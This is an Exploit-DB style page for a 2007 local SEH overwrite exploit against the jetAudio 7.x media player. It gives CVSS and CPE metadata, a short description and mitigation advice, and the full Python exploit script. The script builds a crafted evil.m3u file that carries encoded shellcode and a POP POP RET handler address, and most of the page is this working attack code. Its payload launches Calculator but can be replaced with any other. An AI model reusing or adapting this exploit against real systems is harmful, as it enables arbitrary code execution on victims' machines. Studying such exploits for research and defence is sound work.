jetAudio 7.x (m3u File) 0day Local SEH Overwrite Exploit

vendor:

jetAudio

by:

Krystian Kloskowski (h07) <h07@interia.pl>

7.5

CVSS

HIGH

SEH Overwrite Exploit

CWE

Product Name: jetAudio

Affected Version From: jetAudio 7.x

Affected Version To: jetAudio 7.x

Patch Exists: NO

Related CWE:

CPE: a:jetaudio:jetaudio:7.x

Metasploit:

Other Scripts:

Platforms Tested: Windows 2000 SP4 Polish

2007

jetAudio 7.x (m3u File) 0day Local SEH Overwrite Exploit

This exploit takes advantage of a SEH (Structured Exception Handling) overwrite vulnerability in jetAudio 7.x. By crafting a specially crafted m3u file, an attacker can overwrite the SEH record and execute arbitrary code. The exploit has been tested on jetAudio 7.0.3 Basic on Windows 2000 SP4 Polish. The exploit payload is a Windows Execute Command shellcode that launches the Calculator. This exploit is provided for educational purposes only.

Mitigation:

Apply the latest security patches provided by the vendor. Avoid opening or running suspicious m3u files from untrusted sources.

Source

Exploit-DB raw data:

#!/usr/bin/python
# jetAudio 7.x (m3u File) 0day Local SEH Overwrite Exploit
# Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
# Tested on: jetAudio 7.0.3 Basic / 2k SP4 Polish
# Shellcode: Windows Execute Command (calc) <metasploit.com>
# Just for fun  ;) 
##

from struct import pack

m3u = ("#EXTM3U\nhttp://%s")

shellcode = (
"\x6a\x22\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8d\x6c\xf6"
"\xb2\x83\xeb\xfc\xe2\xf4\x71\x84\xb2\xb2\x8d\x6c\x7d\xf7\xb1\xe7"
"\x8a\xb7\xf5\x6d\x19\x39\xc2\x74\x7d\xed\xad\x6d\x1d\xfb\x06\x58"
"\x7d\xb3\x63\x5d\x36\x2b\x21\xe8\x36\xc6\x8a\xad\x3c\xbf\x8c\xae"
"\x1d\x46\xb6\x38\xd2\xb6\xf8\x89\x7d\xed\xa9\x6d\x1d\xd4\x06\x60"
"\xbd\x39\xd2\x70\xf7\x59\x06\x70\x7d\xb3\x66\xe5\xaa\x96\x89\xaf"
"\xc7\x72\xe9\xe7\xb6\x82\x08\xac\x8e\xbe\x06\x2c\xfa\x39\xfd\x70"
"\x5b\x39\xe5\x64\x1d\xbb\x06\xec\x46\xb2\x8d\x6c\x7d\xda\xb1\x33"
"\xc7\x44\xed\x3a\x7f\x4a\x0e\xac\x8d\xe2\xe5\x9c\x7c\xb6\xd2\x04"
"\x6e\x4c\x07\x62\xa1\x4d\x6a\x0f\x97\xde\xee\x6c\xf6\xb2")

NEXT_SEH_RECORD = 0x909006EB  # JMP SHORT + 0x06
SE_HANDLER = 0x7CEA61F7       # POP POP RET (SHELL32.DLL / 2k SP4 Polish)

buf = "CLICK ME"
buf += "\x20" * 1009
buf += pack("<L", NEXT_SEH_RECORD)
buf += pack("<L", SE_HANDLER)
buf += "\x90" * 128
buf += shellcode

m3u %= buf

fd = open("evil.m3u", "w")
fd.write(m3u)
fd.close()

print "DONE"

# EoF

# milw0rm.com [2007-10-14]